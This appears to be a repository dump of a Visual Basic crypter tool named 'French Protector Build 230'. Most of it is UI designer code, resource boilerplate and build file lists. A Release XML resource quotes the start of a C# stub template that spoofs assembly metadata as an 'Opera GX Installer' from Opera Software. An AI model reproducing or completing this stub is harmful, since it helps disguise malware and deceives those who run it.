129) 165 | Me.Controls.Add(Me.Panel1) 166 | Me.FormBorderStyle = System.Windows.Forms.FormBorderStyle.None 167 | Me.Name = "compress" 168 | Me.ShowIcon = False 169 | Me.ShowInTaskbar = False 170 | Me.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen 171 | Me.Text = "compress" 172 | Me.Panel2.ResumeLayout(False) 173 | Me.Panel2.PerformLayout() 174 | CType(Me.PictureBox1, System.ComponentModel.ISupportInitialize).EndInit() 175 | Me.Panel1.ResumeLayout(False) 176 | Me.Panel1.PerformLayout() 177 | Me.ResumeLayout(False) 178 | 179 | End Sub 180 | 181 | Friend WithEvents Panel2 As Panel 182 | Friend WithEvents Guna2GradientButton1 As Guna.UI2.WinForms.Guna2GradientButton 183 | Friend WithEvents PictureBox1 As PictureBox 184 | Friend WithEvents Guna2GradientButton2 As Guna.UI2.WinForms.Guna2GradientButton 185 | Friend WithEvents Label1 As Label 186 | Friend WithEvents Panel1 As Panel 187 | Friend WithEvents Guna2CheckBox2 As Guna.UI2.WinForms.Guna2CheckBox 188 | Friend WithEvents Guna2DragControl1 As Guna.UI2.WinForms.Guna2DragControl 189 | Friend WithEvents Guna2DragControl2 As Guna.UI2.WinForms.Guna2DragControl 190 | Friend WithEvents Guna2DragControl3 As Guna.UI2.WinForms.Guna2DragControl 191 | End Class 192 | -------------------------------------------------------------------------------- /French Protector Build 230/compress.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 17, 17 122 | 123 | 124 | 186, 12 125 | 126 | 127 | 339, 17 128 | 129 | -------------------------------------------------------------------------------- /French Protector Build 230/compress.vb: -------------------------------------------------------------------------------- 1 | Public Class compress 2 | Private Sub Guna2GradientButton1_Click(sender As Object, e As EventArgs) Handles Guna2GradientButton1.Click 3 | Me.Hide() 4 | End Sub 5 | End Class -------------------------------------------------------------------------------- /French Protector Build 230/download.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 17, 17 122 | 123 | 124 | 178, 17 125 | 126 | 127 | 339, 17 128 | 129 | -------------------------------------------------------------------------------- /French Protector Build 230/download.vb: -------------------------------------------------------------------------------- 1 | Public Class download 2 | Private Sub Guna2GradientButton1_Click(sender As Object, e As EventArgs) Handles Guna2GradientButton1.Click 3 | Me.Hide() 4 | End Sub 5 | 6 | Private Sub Guna2CheckBox2_CheckedChanged(sender As Object, e As EventArgs) Handles Guna2CheckBox2.CheckedChanged 7 | If Guna2CheckBox2.Checked = True Then 8 | Else 9 | Guna2CheckBox2.Checked = False 10 | End If 11 | End Sub 12 | End Class -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.vb: -------------------------------------------------------------------------------- 1 | ' 2 | Option Strict Off 3 | Option Explicit On 4 | 5 | Imports System 6 | Imports System.Reflection 7 | 8 | -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Debug/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/French Protector Build 230.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Debug/French Protector Build 230.exe -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/French Protector Build 230.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Debug/French Protector Build 230.pdb -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/French Protector Build 230.vbproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Debug/French Protector Build 230.vbproj.AssemblyReference.cache -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/French Protector Build 230.vbproj.CopyComplete: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Debug/French Protector Build 230.vbproj.CopyComplete -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/French Protector Build 230.vbproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 17ba60a4230e30287267ac3423bd9f43734d8f1f 2 | -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/French Protector Build 230.vbproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\bin\Debug\French Protector Build 230.exe.config 2 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\bin\Debug\French Protector Build 230.exe 3 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\bin\Debug\French Protector Build 230.pdb 4 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\bin\Debug\French Protector Build 230.xml 5 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Debug\French Protector Build 230.vbproj.AssemblyReference.cache 6 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Debug\French_Protector_Build_230.Form1.resources 7 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Debug\French_Protector_Build_230.Resources.resources 8 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Debug\French Protector Build 230.vbproj.GenerateResource.cache 9 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Debug\French Protector Build 230.vbproj.CoreCompileInputs.cache 10 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Debug\French Protector Build 230.exe 11 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Debug\French Protector Build 230.xml 12 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Debug\French Protector Build 230.pdb 13 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\bin\Debug\Guna.UI2.dll 14 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Debug\French Protector Build 230.vbproj.CopyComplete 15 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Debug\French_Protector_Build_230.compress.resources 16 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Debug\French_Protector_Build_230.Delay.resources 17 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Debug\French_Protector_Build_230.download.resources 18 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\bin\Debug\French Protector Build 230.exe.config 19 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Debug\French Protector Build 230.exe 20 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Debug\French Protector Build 230.xml 21 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Debug\French Protector Build 230.pdb 22 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Debug\French_Protector_Build_230.compress.resources 23 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Debug\French_Protector_Build_230.Delay.resources 24 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Debug\French_Protector_Build_230.download.resources 25 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Debug\French_Protector_Build_230.Form1.resources 26 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Debug\French Protector Build 230.vbproj.GenerateResource.Cache 27 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\bin\Debug\French Protector Build 230.exe 28 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\bin\Debug\French Protector Build 230.pdb 29 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\bin\Debug\French Protector Build 230.xml 30 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Debug\French_Protector_Build_230.Resources.resources 31 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Debug\French_Protector_Build_230.License.resources 32 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Debug\French_Protector_Build_230.IconChanger.resources 33 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\bin\Debug\French Protector Build 230.exe.config 34 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\obj\Debug\French Protector Build 230.exe 35 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\obj\Debug\French Protector Build 230.xml 36 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\obj\Debug\French Protector Build 230.pdb 37 | -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/French Protector Build 230.vbproj.GenerateResource.Cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Debug/French Protector Build 230.vbproj.GenerateResource.Cache -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/French Protector Build 230.xml: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | FrenchProtectorBuild230 6 | 7 | 8 | 9 | 10 | 11 | Returns the cached ResourceManager instance used by this class. 12 | 13 | 14 | 15 | Overrides the current thread's CurrentUICulture property for all 16 | resource lookups using this strongly typed resource class. 17 | 18 | 19 | 20 | A strongly-typed resource class, for looking up localized strings, etc. 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/French_Protector_Build_230.Delay.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Debug/French_Protector_Build_230.Delay.resources -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/French_Protector_Build_230.Form1.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Debug/French_Protector_Build_230.Form1.resources -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/French_Protector_Build_230.IconChanger.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Debug/French_Protector_Build_230.IconChanger.resources -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/French_Protector_Build_230.License.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Debug/French_Protector_Build_230.License.resources -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/French_Protector_Build_230.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Debug/French_Protector_Build_230.Resources.resources -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/French_Protector_Build_230.compress.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Debug/French_Protector_Build_230.compress.resources -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/French_Protector_Build_230.download.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Debug/French_Protector_Build_230.download.resources -------------------------------------------------------------------------------- /French Protector Build 230/obj/Debug/TempPE/My Project.Resources.Designer.vb.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Debug/TempPE/My Project.Resources.Designer.vb.dll -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/.NETFramework,Version=v4.7.2.AssemblyAttributes.vb: -------------------------------------------------------------------------------- 1 | ' 2 | Option Strict Off 3 | Option Explicit On 4 | 5 | Imports System 6 | Imports System.Reflection 7 | 8 | -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb: -------------------------------------------------------------------------------- 1 | ' 2 | Option Strict Off 3 | Option Explicit On 4 | 5 | Imports System 6 | Imports System.Reflection 7 | 8 | -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Release/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/French Protector Build 230.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Release/French Protector Build 230.exe -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/French Protector Build 230.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Release/French Protector Build 230.pdb -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/French Protector Build 230.vbproj.AssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Release/French Protector Build 230.vbproj.AssemblyReference.cache -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/French Protector Build 230.vbproj.CoreCompileInputs.cache: -------------------------------------------------------------------------------- 1 | 9165cc5f5be597dedecfd61239c1d4770a474755 2 | -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/French Protector Build 230.vbproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.exe.config 2 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.exe 3 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.pdb 4 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.xml 5 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\bin\Release\Guna.UI2.dll 6 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.compress.resources 7 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.Delay.resources 8 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.download.resources 9 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.Form1.resources 10 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.Resources.resources 11 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.vbproj.GenerateResource.cache 12 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.vbproj.CoreCompileInputs.cache 13 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.vbproj.CopyComplete 14 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.exe 15 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.xml 16 | C:\Users\aarbe\source\repos\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.pdb 17 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.exe.config 18 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.exe 19 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.xml 20 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.pdb 21 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.exe 22 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.pdb 23 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.xml 24 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.vbprojResolveAssemblyReference.cache 25 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.compress.resources 26 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.Delay.resources 27 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.download.resources 28 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.Form1.resources 29 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.IconChanger.resources 30 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.License.resources 31 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.Resources.resources 32 | C:\Users\hey\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.vbproj.GenerateResource.Cache 33 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.exe.config 34 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.exe 35 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.xml 36 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.pdb 37 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.compress.resources 38 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.Delay.resources 39 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.download.resources 40 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.Form1.resources 41 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.IconChanger.resources 42 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.License.resources 43 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.Resources.resources 44 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.vbproj.GenerateResource.Cache 45 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.exe 46 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.pdb 47 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.xml 48 | C:\Users\hey\Desktop\dosyalar\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.vbprojResolveAssemblyReference.cache 49 | D:\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.exe.config 50 | D:\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.exe 51 | D:\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.pdb 52 | D:\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.xml 53 | D:\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.vbproj.SuggestedBindingRedirects.cache 54 | D:\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.compress.resources 55 | D:\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.Delay.resources 56 | D:\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.download.resources 57 | D:\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.Form1.resources 58 | D:\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.IconChanger.resources 59 | D:\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.License.resources 60 | D:\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.Resources.resources 61 | D:\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.vbproj.GenerateResource.cache 62 | D:\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.vbproj.CoreCompileInputs.cache 63 | D:\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.vbproj.CopyComplete 64 | D:\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.exe 65 | D:\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.xml 66 | D:\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.pdb 67 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.exe.config 68 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.exe 69 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.pdb 70 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\bin\Release\French Protector Build 230.xml 71 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.vbproj.AssemblyReference.cache 72 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.vbproj.SuggestedBindingRedirects.cache 73 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.compress.resources 74 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.Delay.resources 75 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.download.resources 76 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.Form1.resources 77 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.IconChanger.resources 78 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.License.resources 79 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French_Protector_Build_230.Resources.resources 80 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.vbproj.GenerateResource.cache 81 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.vbproj.CoreCompileInputs.cache 82 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.vbproj.CopyComplete 83 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.exe 84 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.xml 85 | C:\Users\redbloom\Desktop\French Protector Build 230\French Protector Build 230\obj\Release\French Protector Build 230.pdb 86 | -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/French Protector Build 230.vbproj.GenerateResource.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Release/French Protector Build 230.vbproj.GenerateResource.cache -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/French Protector Build 230.vbproj.SuggestedBindingRedirects.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Release/French Protector Build 230.vbproj.SuggestedBindingRedirects.cache -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/French Protector Build 230.vbprojResolveAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Release/French Protector Build 230.vbprojResolveAssemblyReference.cache -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/French Protector Build 230.xml: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | French Protector Build 230 6 | 7 | 8 | 9 | 10 | 11 | A strongly-typed resource class, for looking up localized strings, etc. 12 | 13 | 14 | 15 | 16 | Returns the cached ResourceManager instance used by this class. 17 | 18 | 19 | 20 | 21 | Overrides the current thread's CurrentUICulture property for all 22 | resource lookups using this strongly typed resource class. 23 | 24 | 25 | 26 | 27 | Looks up a localized string similar to 28 | using System; 29 | using System.Collections.Generic; 30 | //download using System.Diagnostics; 31 | using System.Net; 32 | using System.Reflection; 33 | using System.Runtime.InteropServices; 34 | using System.Security.Cryptography; 35 | using System.Text; 36 | using System.Threading; 37 | using System.Windows.Forms; 38 | 39 | //iamassembly [assembly: AssemblyTitle("Opera GX")] 40 | //iamassembly [assembly: AssemblyDescription("Opera GX Installer")] 41 | //iamassembly [assembly: AssemblyCompany("Opera Software")] 42 | //iamassembly [assembly: AssemblyProduct(" [rest of string was truncated]";. 43 | 44 | 45 | 46 | 47 | -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/French_Protector_Build_230.Delay.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/CodiumAlgorithm/French-Protector-Build-230-Open-Source-Crypter/fc3e0c3f49afbdd0e31052002b561e2432a8b0b8/French Protector Build 230/obj/Release/French_Protector_Build_230.Delay.resources -------------------------------------------------------------------------------- /French Protector Build 230/obj/Release/French_Protector_Build_230.Form1.resources: -------------------------------------------------------------------------------- 